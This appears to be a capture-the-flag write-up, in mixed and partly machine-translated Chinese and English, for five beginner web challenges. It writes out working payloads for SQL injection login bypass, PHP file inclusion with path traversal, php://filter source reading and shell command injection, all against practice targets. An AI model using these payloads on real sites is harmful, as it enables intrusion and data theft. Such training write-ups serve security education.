一、[极客大挑战 2019]EasySQL1 

Once in let's log in to the website,

尝试一下,

可以看到是get型,直接尝试绕过,

?username=admin' or '1'='1&password=123' or '1'='1

 ' to close the originalsqlThe sentence thus constitutes a universal sentence.

二、[HCTF 2018]WarmUp1

 给了个图片,我们f12或ctrl+u可以看到有个source.php隐藏部分

所以我们在url后面加上 /source.php

Then there is the code audit.

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            //白名单列表
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            //判断是否为字符串,If not, return an error
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            //第一次判断：Compare the value you pass in with the ones in the whitelist,Return true if there is
            if (in_array($page, $whitelist)) {
                return true;
            }
            //第一次过滤,只取第一个？前的字符串
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            //Determine whether it is in the whitelist or not
            if (in_array($_page, $whitelist)) {
                return true;
            }
            //对page进行url编码,Then there are two judgments
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

first the following if 判断,如果fileThe passed parameter is not empty,为字符串,And the file inclusion can be performed through the above filters.

所以我们这里url后加上hint.php看看

提示我们在ffffllllaaaagggg文件中,然后我们在将url变成

/index.php?file=hint.php?../../../../../ffffllllaaaagggg

 /indexThe front part is your range address.（这里的index也可以换成hint或source,Just the original code will be displayed）

我们来分析一下,传入后,先对filevalue to judgefileThe string after that,It can be seen that it is not empty,字符串,Then pass this string to pageMake the above judgments.

刚开始是hint.php?../../../../../ffffllllaaaagggg,Then the first judgment was unsuccessful,Then filter down for the first time,过滤后_page值为hint.php,在白名单内,So the judgment is correct,执行文件包含,后面的那些../is used to access the file,Because I don't know which directory it is in, I try it one by one.

最后成功拿到flag

三、[极客大挑战 2019]Havefun1

这个很简单的,After entering, you can see that some code is hidden in the source code,

 所以我们直接传递一个cat参数,Let its parameter value be dog

四、[ACTF2020 新生赛]Include1

When you go in, you see onetips,我们点击一下,可以看到url变了,and prompts us to include and with the filephp伪协议来完成.

file=php://filter/read=convert.base64-encode/resource=flag.php

然后去base64解密,

flag{ef7e62e5-5ed4-4f53-8c7c-fb80aaabf7cc}

 If you don't understand, you can read these two articles

php伪协议（文件包含）_番茄酱料的博客-CSDN博客_php伪协议文件包含

[ACTF2020 新生赛]Include 1_wow小华的博客-CSDN博客

五、[ACTF2020 新生赛]Exec1

Clear command injection vulnerability

常见WEBAttack command injection - 简书 (jianshu.com)

命令注入_extremebingo的博客-CSDN博客_命令注入

直接输入127.0.0.1;ls,The preceding address is your own local address,后面的lsIs to traverse the directory to determineflag文件位置

没有什么东西,Let's look at the upper level,127.0.0.1;cd ../;ls ,这里的cd is to switch folders,ls遍历当前文件夹

 一直到 127.0.0.1;cd ../../../;ls,我们看到了flag

 然后127.0.0.1;cd ../../../;cat flag,Just output the content inside